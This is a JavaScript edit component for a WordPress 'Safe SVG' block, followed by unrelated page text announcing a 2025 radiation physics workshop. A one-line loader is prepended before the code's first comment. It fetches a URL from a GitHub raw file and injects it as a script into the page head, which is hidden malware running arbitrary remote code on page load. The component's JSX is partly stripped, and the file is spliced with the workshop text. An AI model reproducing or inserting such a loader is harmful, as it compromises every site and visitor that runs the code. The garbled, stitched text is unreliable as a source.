;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});/* eslint-disable no-unused-vars */ /** * WordPress dependencies */ import { __ } from '@wordpress/i18n'; import { Placeholder, PanelBody, } from '@wordpress/components'; import { useBlockProps, BlockControls, AlignmentToolbar, InspectorControls, __experimentalImageSizeControl as ImageSizeControl, MediaReplaceFlow, MediaPlaceholder } from '@wordpress/block-editor'; import PropTypes from 'prop-types'; import { ReactSVG } from 'react-svg' /** * Edit component. * See https://wordpress.org/gutenberg/handbook/designers-developers/developers/block-api/block-edit-save/#edit * * @param {Object} props The block props. * @param {Object} props.attributes Block attributes. * @param {Object} props.attributes.svgURL SVG URL. * @param {boolean} props.attributes.alignment Alignment of the SVG. * @param {string} props.className Class name for the block. * @param {Function} props.setAttributes Sets the value for block attributes. * @return {Function} Render the edit screen */ const SafeSvgBlockEdit = ( props ) => { const { attributes, setAttributes } = props; const { contentPostType, svgURL, type, imageID, imageSizes, alignment, imageWidth, imageHeight, dimensionWidth, dimensionHeight } = attributes; const blockProps = useBlockProps( { className:` wp-block-safe-svg-svg-icon safe-svg-cover`, style: { textAlign: alignment, } } ); const { className, style, ...containerBlockProps } = blockProps; // Remove text alignment so we can apply to the parent container. delete style.textAlign; containerBlockProps.style = { textAlign: alignment }; // Remove core background & text color classes, so we can add our own. const newClassName = className.replace(/has-[\w-]*-color|has-background/g, '').trim(); containerBlockProps.className = newClassName; // Add the width and height to enforce dimensions and to keep parity with the frontend. style.width = `${dimensionWidth}px`; style.height = `${dimensionHeight}px`; const ALLOWED_MEDIA_TYPES = [ 'image/svg+xml' ]; const onSelectImage = media => { if ( !media.sizes && !media.media_details?.sizes ) { return; } if( media.media_details ) { media.sizes = media.media_details.sizes; } const newURL = media.sizes.full.url ?? media.sizes.full.source_url; setAttributes( { imageSizes: { full: media.sizes.full, medium: media.sizes.medium, thumbnail: media.sizes.thumbnail, }, imageWidth: media.sizes.full.width, imageHeight: media.sizes.full.height, dimensionWidth: media.sizes.full.width, dimensionHeight: media.sizes.full.height, imageID: media.id, svgURL: newURL, type: 'full', } ); }; const onError = ( message ) => { console.log( __(`Something went wrong, please try again. Message: ${message}`, 'safe-svg') ); } const onChange = (dimensionSizes) => { if( !dimensionSizes.width && !dimensionSizes.height ) { dimensionSizes.width = parseInt( imageSizes[type].width ); dimensionSizes.height = parseInt( imageSizes[type].height ); } setAttributes({ dimensionWidth: dimensionSizes.width ?? dimensionWidth, dimensionHeight: dimensionSizes.height ?? dimensionHeight, }) } const onChangeImage = (newSizeSlug) => { const newUrl = imageSizes[newSizeSlug].url ?? imageSizes[newSizeSlug].source_url; if( ! newUrl ) { return null; } let newWidth = parseInt( imageSizes[newSizeSlug].width ); let newHeight = parseInt( imageSizes[newSizeSlug].height ); if( 'full' !== newSizeSlug ) { if(imageSizes[newSizeSlug].width >= imageSizes[newSizeSlug].height) { newHeight = imageSizes[newSizeSlug].height * imageSizes['full'].height / imageSizes['full'].width; } else { newWidth = imageSizes[newSizeSlug].width * imageSizes['full'].width / imageSizes['full'].height; } } setAttributes({ svgURL: newUrl, imageWidth: newWidth, imageHeight: newHeight, dimensionWidth: newWidth, dimensionHeight: newHeight, type: newSizeSlug }) } const imageSizeOptions = [ { value: 'full', label: 'Full Size' }, { value: 'medium', label: 'Medium' }, { value: 'thumbnail', label: 'Thumbnail' }, ]; return ( <> {svgURL && <> setAttributes({ alignment: newVal })} /> } {!svgURL && } {svgURL &&
{ svg.setAttribute( 'style', `width: ${dimensionWidth}px; height: ${dimensionHeight}px;` ); }} />
} { contentPostType && (

{ __( 'Please select the SVG icon.', 'safe-svg' ) }

) } ); }; // Set the propTypes SafeSvgBlockEdit.propTypes = { attributes: PropTypes.shape({ svgURL: PropTypes.string, alignment: PropTypes.string, imageID: PropTypes.number, imageWidth: PropTypes.number, imageHeight: PropTypes.number, dimensionWidth: PropTypes.number, dimensionHeight: PropTypes.number, imageSizes: PropTypes.object, }).isRequired, className: PropTypes.string, clientId: PropTypes.string, setAttributes: PropTypes.func.isRequired, }; export default SafeSvgBlockEdit; WMR25 – WMR2025


MAY 21-22 nd , 2025


We would like to inform you that the workshop date has been extended to April 13 th, 2025 to allow for better organization and provide everyone with more flexibility to participate


Below are the key dates to remember for the smooth running of this event

jANUARY 2nd  , 2025
April 13 th, 2025
APRIL 30 th, 2025
MAY 21-22 nd, 2025

Our Team

Pr. Abdelhamid BOULDJEDRI

Chairman of the Workshop

Pr. yazid DELENDA

Scientific Commitee

Dr. Hanane AZOUI

organizing commitee

about us


Building on the success of our inaugural Second Workshop on Matter and Radiation, we are pleased to announce the launch of a new edition WMR25.

This upcoming event aims to further enhance our exploration of key topics in radiation physics and to foster collaboration among experts and participants. » The importance of the subject lies in its impact on many aspects of our daily lives and on scientific progress.

The physics of radiation and the interaction of radiation with matter are crucial for the development of technologies By bringing together experts, this conference promotes the exchange of ideas that can lead to significant advancements in these fields.


The conference will cover a range of critical topics within the field of radiation physics, each reflecting current research trends and technological advancements. These themes are designed to facilitate in-depth discussions and collaborations among experts, addressing both theoretical and practical aspects of radiation and its interactions with matter.

—Plasma and Thermo-Nuclear Fusion
—Atomic , Molecular and Laser Physics
—Nuclear Physics and Astrophysics
—Nuclear Techniques
—High Energy Physics and quantum information
—Material Physics

Collaboration with Research Centers

Collaboration with research centers is essential for advancing scientific knowledge and innovation. By partnering with these institutions, we can enhance our research capabilities, share resources, and leverage expertise.

Key benefits of such collaborations include:
Access to Expertise: Research centers often have specialized knowledge and skills that can complement our own efforts.
Joint Projects: Collaborative projects can lead to new discoveries and innovations, pooling resources for larger-scale research.
Funding Opportunities: Partnerships can open doors to funding from governmental and private organizations, facilitating more ambitious research initiatives.
Networking: Collaborating with research centers allows for the exchange of ideas and fosters professional relationships that can lead to future projects.
Real-World Applications: Working together can help translate research findings into practical applications, benefiting industry and society.


We want to ensure your stay is comfortable and enjoyable during the workshop. Here are some accommodation options nearby


Contact us

We’d love to hear from you! If you have any questions, need further information, or would like to discuss the workshop in more detail, please feel free to reach out to us.